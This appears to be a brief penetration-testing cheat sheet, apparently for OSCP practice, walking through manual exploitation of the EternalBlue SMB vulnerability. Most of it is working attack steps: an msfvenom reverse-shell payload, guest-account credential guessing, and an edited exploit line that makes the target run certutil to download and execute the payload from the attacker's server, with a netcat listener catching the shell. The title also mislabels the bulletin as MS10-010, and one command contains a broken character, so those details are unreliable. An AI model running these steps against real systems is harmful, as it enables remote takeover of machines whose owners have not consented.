Manual exploit for MS10-010 (Eternal Blue)
nmap --script smb-vuln-ms17–010.nse <target-ip>
pip3 install impacket
• Download 42315.py and mysmb.py
• Make sure 42315.py & mysmb.py is in the same folder
• Create a reverse shell payload:
• Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=<IP> LPORT=4444 > w644444.exe
• Or use a different payload (revshells.com)
• Change lines 36&37 - Enter valid credentials:
USERNAME = ""
PASSWORD = ""
If no credentials is known - try using 'GUEST' account.
Check if GUEST is allowed with - enum4linux -a <target_ip>
• Edit line 923:
service_exec(conn, r'cmd /c certutil -urlcache -split -f http://<Your IP>/w644444.exe w644444.exe & w644444.exe')
Add your IP and change the payload if needed
• Setup Python server on port 80:
python3 -m http.server 80
• Now that we’re done all three tasks, setup a listener on your attack machine:
nc -nlvp 4444
• Then run the exploit:
python 42315.py <target_ip>